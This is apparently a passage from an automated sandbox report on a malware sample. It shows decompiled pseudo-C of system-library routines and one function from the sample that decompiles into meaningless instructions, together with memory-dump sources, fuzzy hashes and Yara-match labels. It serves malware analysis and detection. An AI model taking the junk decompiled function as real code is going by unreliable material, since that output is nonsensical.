						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E04C088F5(_t80, _t85, 0x4c25388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x4c286c0; // 0x9307b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x4c286b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E04B52280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E04C088F5(0x4c285ec, _t85, 0x4c25388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E04B7AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x4c2b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x4c284c0;
																			if(_t82 >=  *0x4c284c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E04C09063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E04B3922A(_t99);
										_t64 = E04B57D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E04C08B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x4c286c0; // 0x9307b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x4c286b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x4c286bc;
													_t87 = 0x4c286b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E04B39240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x4c286c4;
												_t87 = 0x4c286c0;
												L27:
												E04B69B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E04B8D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x4c25388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x4c2538c = _t51;
						goto L6;
					}
				}
			}




















                                                                                                                                    0x04b39082
                                                                                                                                    0x04b39083
                                                                                                                                    0x04b39084
                                                                                                                                    0x04b39085
                                                                                                                                    0x04b39087
                                                                                                                                    0x04b39096
                                                                                                                                    0x04b39098
                                                                                                                                    0x04b39098
                                                                                                                                    0x04b3909e
                                                                                                                                    0x04b390a8
                                                                                                                                    0x04b390e7
                                                                                                                                    0x04b390e7
                                                                                                                                    0x04b390aa
                                                                                                                                    0x04b390b0
                                                                                                                                    0x04b390b7
                                                                                                                                    0x04b390bd
                                                                                                                                    0x04b390dd
                                                                                                                                    0x04b390e6
                                                                                                                                    0x04b390bf
                                                                                                                                    0x04b390bf
                                                                                                                                    0x04b390c7
                                                                                                                                    0x04b390cf
                                                                                                                                    0x04b390f1
                                                                                                                                    0x04b390f2
                                                                                                                                    0x04b390f4
                                                                                                                                    0x04b390f5
                                                                                                                                    0x04b390f6
                                                                                                                                    0x04b390f7
                                                                                                                                    0x04b390f8
                                                                                                                                    0x04b390f9
                                                                                                                                    0x04b390fa
                                                                                                                                    0x04b390fb
                                                                                                                                    0x04b390fc
                                                                                                                                    0x04b390fd
                                                                                                                                    0x04b390fe
                                                                                                                                    0x04b390ff
                                                                                                                                    0x04b39100
                                                                                                                                    0x04b39102
                                                                                                                                    0x04b39107
                                                                                                                                    0x04b3910c
                                                                                                                                    0x04b39110
                                                                                                                                    0x04b39113
                                                                                                                                    0x04b39115
                                                                                                                                    0x04b39136
                                                                                                                                    0x04b3913f
                                                                                                                                    0x04b39143
                                                                                                                                    0x04b937e4
                                                                                                                                    0x04b937e4
                                                                                                                                    0x04b39117
                                                                                                                                    0x04b39117
                                                                                                                                    0x04b3911d
                                                                                                                                    0x00000000
                                                                                                                                    0x04b3911f
                                                                                                                                    0x04b3911f
                                                                                                                                    0x04b39125
                                                                                                                                    0x00000000
                                                                                                                                    0x04b39127
                                                                                                                                    0x04b3912d
                                                                                                                                    0x04b39130
                                                                                                                                    0x04b39134
                                                                                                                                    0x04b39158
                                                                                                                                    0x04b3915d
                                                                                                                                    0x04b39161
                                                                                                                                    0x04b39168
                                                                                                                                    0x04b93715
                                                                                                                                    0x04b3916e
                                                                                                                                    0x04b3916e
                                                                                                                                    0x04b39175
                                                                                                                                    0x04b39177
                                                                                                                                    0x04b3917e
                                                                                                                                    0x04b3917f
                                                                                                                                    0x04b39182
                                                                                                                                    0x04b39182
                                                                                                                                    0x04b39187
                                                                                                                                    0x04b39187
                                                                                                                                    0x04b3918a
                                                                                                                                    0x04b3918d
                                                                                                                                    0x04b3918f
                                                                                                                                    0x04b39192
                                                                                                                                    0x04b39195
                                                                                                                                    0x04b39198
                                                                                                                                    0x04b39198
                                                                                                                                    0x04b39198
                                                                                                                                    0x04b3919a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b9371f
                                                                                                                                    0x04b93721
                                                                                                                                    0x04b93727
                                                                                                                                    0x04b9372f
                                                                                                                                    0x04b93733
                                                                                                                                    0x04b93735
                                                                                                                                    0x04b93738
                                                                                                                                    0x04b9373b
                                                                                                                                    0x04b9373d
                                                                                                                                    0x04b93740
                                                                                                                                    0x00000000
                                                                                                                                    0x04b93746
                                                                                                                                    0x04b93746
                                                                                                                                    0x04b93749
                                                                                                                                    0x00000000
                                                                                                                                    0x04b9374f
                                                                                                                                    0x04b9374f
                                                                                                                                    0x04b93751
                                                                                                                                    0x04b93757
                                                                                                                                    0x04b93759
                                                                                                                                    0x04b9375c
                                                                                                                                    0x04b9375c
                                                                                                                                    0x04b9375e
                                                                                                                                    0x04b9375e
                                                                                                                                    0x04b93761
                                                                                                                                    0x04b93764
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b93766
                                                                                                                                    0x04b93768
                                                                                                                                    0x04b937a3
                                                                                                                                    0x04b937a3
                                                                                                                                    0x04b937a5
                                                                                                                                    0x04b937a7
                                                                                                                                    0x04b937ad
                                                                                                                                    0x04b937b0
                                                                                                                                    0x04b937b2
                                                                                                                                    0x04b937bc
                                                                                                                                    0x04b937c2
                                                                                                                                    0x04b937c2
                                                                                                                                    0x04b937b2
                                                                                                                                    0x04b39187
                                                                                                                                    0x04b39187
                                                                                                                                    0x04b3918a
                                                                                                                                    0x04b3918d
                                                                                                                                    0x04b3918f
                                                                                                                                    0x04b39192
                                                                                                                                    0x04b39195
                                                                                                                                    0x00000000
                                                                                                                                    0x04b39195
                                                                                                                                    0x00000000
                                                                                                                                    0x04b9376a
                                                                                                                                    0x04b9376a
                                                                                                                                    0x04b9376a
                                                                                                                                    0x04b9376c
                                                                                                                                    0x04b9376c
                                                                                                                                    0x04b9376f
                                                                                                                                    0x04b93775
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b93777
                                                                                                                                    0x04b93779
                                                                                                                                    0x04b93782
                                                                                                                                    0x04b93787
                                                                                                                                    0x04b93789
                                                                                                                                    0x04b93790
                                                                                                                                    0x04b93790
                                                                                                                                    0x04b9378b
                                                                                                                                    0x04b9378b
                                                                                                                                    0x04b9378b
                                                                                                                                    0x04b93792
                                                                                                                                    0x04b93795
                                                                                                                                    0x00000000
                                                                                                                                    0x04b93795
                                                                                                                                    0x00000000
                                                                                                                                    0x04b93779
                                                                                                                                    0x04b93798
                                                                                                                                    0x00000000
                                                                                                                                    0x04b93798
                                                                                                                                    0x00000000
                                                                                                                                    0x04b93768
                                                                                                                                    0x04b9379b
                                                                                                                                    0x04b9379b
                                                                                                                                    0x04b93751
                                                                                                                                    0x04b93749
                                                                                                                                    0x00000000
                                                                                                                                    0x04b93740
                                                                                                                                    0x04b391a0
                                                                                                                                    0x04b391a3
                                                                                                                                    0x04b391a9
                                                                                                                                    0x04b391b0
                                                                                                                                    0x00000000
                                                                                                                                    0x04b391b0
                                                                                                                                    0x04b39187
                                                                                                                                    0x04b391b4
                                                                                                                                    0x04b391b4
                                                                                                                                    0x04b391bb
                                                                                                                                    0x04b391c0
                                                                                                                                    0x04b391c5
                                                                                                                                    0x04b391c7
                                                                                                                                    0x04b937da
                                                                                                                                    0x04b391cd
                                                                                                                                    0x04b391cd
                                                                                                                                    0x04b391cd
                                                                                                                                    0x04b391d2
                                                                                                                                    0x04b391d5
                                                                                                                                    0x04b39239
                                                                                                                                    0x04b39239
                                                                                                                                    0x04b391d7
                                                                                                                                    0x04b391db
                                                                                                                                    0x04b391e1
                                                                                                                                    0x04b391e7
                                                                                                                                    0x04b391fd
                                                                                                                                    0x04b39203
                                                                                                                                    0x04b3921e
                                                                                                                                    0x04b39223
                                                                                                                                    0x00000000
                                                                                                                                    0x04b39205
                                                                                                                                    0x04b39205
                                                                                                                                    0x04b39208
                                                                                                                                    0x04b3920c
                                                                                                                                    0x04b39214
                                                                                                                                    0x04b39214
                                                                                                                                    0x04b3920c
                                                                                                                                    0x04b391e9
                                                                                                                                    0x04b391e9
                                                                                                                                    0x04b391ee
                                                                                                                                    0x04b391f3
                                                                                                                                    0x04b391f3
                                                                                                                                    0x04b391f3
                                                                                                                                    0x04b391e7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b39134
                                                                                                                                    0x04b39125
                                                                                                                                    0x04b3911d
                                                                                                                                    0x04b3914e
                                                                                                                                    0x04b390d1
                                                                                                                                    0x04b390d1
                                                                                                                                    0x04b390d3
                                                                                                                                    0x04b390d6
                                                                                                                                    0x04b390d8
                                                                                                                                    0x00000000
                                                                                                                                    0x04b390d8
                                                                                                                                    0x04b390cf

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1ffc1026fb36535c0e1988d298124eff10f9aa48a658cde2191f5c5bc23fd39e
                                                                                                                                    • Instruction ID: 7bc57e4b964bd67c28a9449699f2cd9b84d655e47a6dc325dc475a14cccd3528
                                                                                                                                    • Opcode Fuzzy Hash: 1ffc1026fb36535c0e1988d298124eff10f9aa48a658cde2191f5c5bc23fd39e
                                                                                                                                    • Instruction Fuzzy Hash: E101F4B2A026009FE3299F29D940B12B7A9EB81325F2140A6E5019B691C3F5FC41CBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00416227, Relevance: .1, Instructions: 53COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 18%
                                                                                                                                    			E00416227(signed int __eax, signed char __ebx, void* __ecx, signed int __edi, void* __esi) {
				signed char _t31;
				signed int _t32;
				signed int _t36;
				signed char _t44;
				void* _t45;
				void* _t49;
				signed int _t55;
				signed int _t56;
				void* _t63;
				signed int _t69;
				void* _t72;
				void* _t77;

				L0:
				while(1) {
					L0:
					_t55 = __edi;
					_t49 = __ecx;
					_t44 = __ebx;
					_t31 = __eax & 0x000000bd;
					L2:
					while(_t72 <= 0) {
						 *(_t55 - 0x15) =  ~( *(_t55 - 0x15));
						_t72 = _t31 - 0x7e5ef602;
					}
					_t32 = _t31 | 0x000000d0;
					_push(_t44);
					 *0x45 =  *0x45 - _t32;
					if( *0x45 >= 0) {
						asm("int1");
						asm("lds edx, [edi-0x4d]");
						_pop(_t55);
						asm("aaa");
					}
					asm("arpl [edx], dx");
					 *0x45 =  *0x45 | _t32;
					asm("wait");
					asm("pushfd");
					asm("das");
					asm("fsubr st0, st1");
					asm("invalid");
					asm("das");
					asm("in eax, 0x86");
					_t36 =  *(( *0xd6106c7a | _t44) + 0x2eeef7b) |  *_t55;
					asm("stosb");
					_t56 = _t55 |  *(_t49 - 0x7a);
					asm("invalid");
					asm("cld");
					do {
						L6:
						asm("sbb esp, esp");
						asm("cmpsb");
						 *0xceeefd2b = _t36;
						asm("out 0x48, al");
						_t36 = _t36 &  *0x2956A75B;
						L7:
						_t63 = 0x2956a7a3;
						asm("clc");
						goto 0xe29;
						asm("repne mov [bp+0x1b], fs");
						asm("out dx, al");
						asm("sbb edi, 0xea762863");
					} while (0x8795d7d3 >> 0x8795d7d3 > 0);
					_t45 = _t44 + 1;
					asm("movsd");
					asm("adc eax, 0xa9bd2400");
				}
				_t77 = _t63 - 1;
				if(_t77 != 0) {
					L12:
					asm("adc al, 0xed");
					asm("lodsb");
					asm("adc [esi+ebp*4+0x65], dh");
					_push(0x24);
					 *0x000001B7 =  *((intOrPtr*)(0x1b7)) + _t45 + _t69;
					asm("cdq");
					_t36 = 0xffffffffdb4c4daf;
				} else {
					if(_t77 >= 0) {
						 *(_t45 + 0x7e + _t36 * 2) =  *(_t45 + 0x7e + _t36 * 2) >> 0x8795d7d3 >> 0x8795d7d3;
						asm("lahf");
						asm("sbb eax, 0xb37fb519");
						 *(_t69 + _t56 * 8 - 0x67f7563f) = _t56;
						asm("std");
						asm("fmulp st6, st0");
						_t18 = (_t36 ^ 0x0000002a | _t56) + 0xae07ad42;
						_t36 = _t69;
						_t69 = _t18;
						asm("out dx, eax");
						_t45 = _t45 + 1 - 1;
						_t56 = _t56 |  *(_t45 - 0x2b1edf88);
						asm("movsd");
						asm("movsd");
						 *_t36 =  *_t36 + 0x14;
						asm("aaa");
						asm("sbb esp, [edi]");
						 *(_t56 + 0x61) =  *(_t56 + 0x61) << 0xbadbac;
						asm("sbb eax, 0x9238f338");
						 *0x97dc031d = _t36;
						goto L12;
					}
				}
				asm("sbb ebx, [ecx+0x1c93159d]");
				return _t36 ^ 0xdb4c4d8a;
			}















                                                                                                                                    0x00416227
                                                                                                                                    0x00416227
                                                                                                                                    0x00416227
                                                                                                                                    0x00416227
                                                                                                                                    0x00416227
                                                                                                                                    0x00416227
                                                                                                                                    0x00416227
                                                                                                                                    0x00000000
                                                                                                                                    0x004161b7
                                                                                                                                    0x004161af
                                                                                                                                    0x004161b4
                                                                                                                                    0x004161b4
                                                                                                                                    0x004161ba
                                                                                                                                    0x004161bc
                                                                                                                                    0x004161bd
                                                                                                                                    0x004161bf
                                                                                                                                    0x004161c1
                                                                                                                                    0x004161c2
                                                                                                                                    0x004161c5
                                                                                                                                    0x004161c6
                                                                                                                                    0x004161c6
                                                                                                                                    0x004161c7
                                                                                                                                    0x004161c9
                                                                                                                                    0x004161cb
                                                                                                                                    0x004161cc
                                                                                                                                    0x004161d2
                                                                                                                                    0x004161d5
                                                                                                                                    0x004161de
                                                                                                                                    0x004161e0
                                                                                                                                    0x004161e7
                                                                                                                                    0x004161e9
                                                                                                                                    0x004161eb
                                                                                                                                    0x004161ec
                                                                                                                                    0x004161ef
                                                                                                                                    0x004161f1
                                                                                                                                    0x004161f2
                                                                                                                                    0x004161f2
                                                                                                                                    0x004161f2
                                                                                                                                    0x004161f4
                                                                                                                                    0x004161fb
                                                                                                                                    0x00416200
                                                                                                                                    0x00416202
                                                                                                                                    0x00416203
                                                                                                                                    0x00416203
                                                                                                                                    0x0041620b
                                                                                                                                    0x0041620e
                                                                                                                                    0x00416215
                                                                                                                                    0x0041621a
                                                                                                                                    0x0041621b
                                                                                                                                    0x0041621b
                                                                                                                                    0x00416223
                                                                                                                                    0x00416224
                                                                                                                                    0x00416225
                                                                                                                                    0x00416225
                                                                                                                                    0x0041622e
                                                                                                                                    0x0041622f
                                                                                                                                    0x0041626f
                                                                                                                                    0x00416272
                                                                                                                                    0x00416276
                                                                                                                                    0x00416278
                                                                                                                                    0x0041627c
                                                                                                                                    0x0041627e
                                                                                                                                    0x00416282
                                                                                                                                    0x00416283
                                                                                                                                    0x00416231
                                                                                                                                    0x00416231
                                                                                                                                    0x00416233
                                                                                                                                    0x00416239
                                                                                                                                    0x0041623a
                                                                                                                                    0x0041623f
                                                                                                                                    0x00416249
                                                                                                                                    0x0041624a
                                                                                                                                    0x00416251
                                                                                                                                    0x00416251
                                                                                                                                    0x00416251
                                                                                                                                    0x00416253
                                                                                                                                    0x00416254
                                                                                                                                    0x00416255
                                                                                                                                    0x0041625b
                                                                                                                                    0x0041625c
                                                                                                                                    0x0041625d
                                                                                                                                    0x00416260
                                                                                                                                    0x00416263
                                                                                                                                    0x00416265
                                                                                                                                    0x00416268
                                                                                                                                    0x0041626d
                                                                                                                                    0x00000000
                                                                                                                                    0x0041626d
                                                                                                                                    0x00416231
                                                                                                                                    0x00416289
                                                                                                                                    0x00416299

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b663c1996ee065c985d21b508a21b5076a93f4d9708f9a4a4d15cc1e81dd48fe
                                                                                                                                    • Instruction ID: 1d5e59fa00cd10b49099bfd80265090411c8b9fb6e9db818f0b9653b45bb975c
                                                                                                                                    • Opcode Fuzzy Hash: b663c1996ee065c985d21b508a21b5076a93f4d9708f9a4a4d15cc1e81dd48fe
                                                                                                                                    • Instruction Fuzzy Hash: 74017B315883094FDB52DE68AC465F6B3E2CEA2754B442AAACC459B161D229D057C7C1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04BF14FB, Relevance: .0, Instructions: 48COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 61%
                                                                                                                                    			E04BF14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4c2d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04B7FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E04B57D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04B7B640(E04B79AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                                                                    0x04bf14fb
                                                                                                                                    0x04bf14fb
                                                                                                                                    0x04bf150a
                                                                                                                                    0x04bf1514
                                                                                                                                    0x04bf1519
                                                                                                                                    0x04bf151b
                                                                                                                                    0x04bf1526
                                                                                                                                    0x04bf152c
                                                                                                                                    0x04bf1534
                                                                                                                                    0x04bf1537
                                                                                                                                    0x04bf153a
                                                                                                                                    0x04bf1545
                                                                                                                                    0x04bf1557
                                                                                                                                    0x04bf1547
                                                                                                                                    0x04bf1550
                                                                                                                                    0x04bf1550
                                                                                                                                    0x04bf1562
                                                                                                                                    0x04bf1563
                                                                                                                                    0x04bf1565
                                                                                                                                    0x04bf156a
                                                                                                                                    0x04bf157f

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c424b12224b971183222654c1cdfdbbb231f88b9ed568839f32f57a134e2aa6e
                                                                                                                                    • Instruction ID: da969faaa56468254024fa8f533ee6f58e9488241895d396c53fc987bd4bd79b
                                                                                                                                    • Opcode Fuzzy Hash: c424b12224b971183222654c1cdfdbbb231f88b9ed568839f32f57a134e2aa6e
                                                                                                                                    • Instruction Fuzzy Hash: 76019271A01248AFDB14DFA8D841FAEB7B8EF44714F0040A6F915EB280DA74EE01CB94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04BF138A, Relevance: .0, Instructions: 48COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 61%
                                                                                                                                    			E04BF138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4c2d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04B7FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E04B57D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04B7B640(E04B79AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                                                                                                    0x04bf138a
                                                                                                                                    0x04bf138a
                                                                                                                                    0x04bf1399
                                                                                                                                    0x04bf13a3
                                                                                                                                    0x04bf13a8
                                                                                                                                    0x04bf13aa
                                                                                                                                    0x04bf13b5
                                                                                                                                    0x04bf13bb
                                                                                                                                    0x04bf13c3
                                                                                                                                    0x04bf13c6
                                                                                                                                    0x04bf13c9
                                                                                                                                    0x04bf13d4
                                                                                                                                    0x04bf13e6
                                                                                                                                    0x04bf13d6
                                                                                                                                    0x04bf13df
                                                                                                                                    0x04bf13df
                                                                                                                                    0x04bf13f1
                                                                                                                                    0x04bf13f2
                                                                                                                                    0x04bf13f4
                                                                                                                                    0x04bf13f9
                                                                                                                                    0x04bf140e

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 78240d0411d6507eb1d74f97c993b820649ee72f7b102474f0c8763fc5c106cc
                                                                                                                                    • Instruction ID: ddc03dc0aa99069d9fab932b5d509b5939683f19ebaac1ed450bf64625b63068
                                                                                                                                    • Opcode Fuzzy Hash: 78240d0411d6507eb1d74f97c993b820649ee72f7b102474f0c8763fc5c106cc
                                                                                                                                    • Instruction Fuzzy Hash: 4A015271A01218AFDB14DFA9D841FAEB7B8EF44714F0040A6F915EB280DA74EE05CB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B4B02A, Relevance: .0, Instructions: 46COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04B4B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E04B57D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E04BB7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                                                                                                    0x04b4b037
                                                                                                                                    0x04b4b039
                                                                                                                                    0x04b4b03b
                                                                                                                                    0x04b4b040
                                                                                                                                    0x04b9a60e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b9a61d
                                                                                                                                    0x04b4b04b
                                                                                                                                    0x04b4b04e
                                                                                                                                    0x04b9a627
                                                                                                                                    0x04b9a634
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b9a641
                                                                                                                                    0x04b9a653
                                                                                                                                    0x04b9a643
                                                                                                                                    0x04b9a64c
                                                                                                                                    0x04b9a64c
                                                                                                                                    0x04b9a65b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b9a66c
                                                                                                                                    0x04b4b057
                                                                                                                                    0x04b4b057
                                                                                                                                    0x04b4b057
                                                                                                                                    0x04b4b046
                                                                                                                                    0x04b4b046
                                                                                                                                    0x00000000

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                                                                                                    • Instruction ID: 0664b0476b1c6f4580fa3d01550ce3265b3cae4abd31ff44d1093e19a59d041f
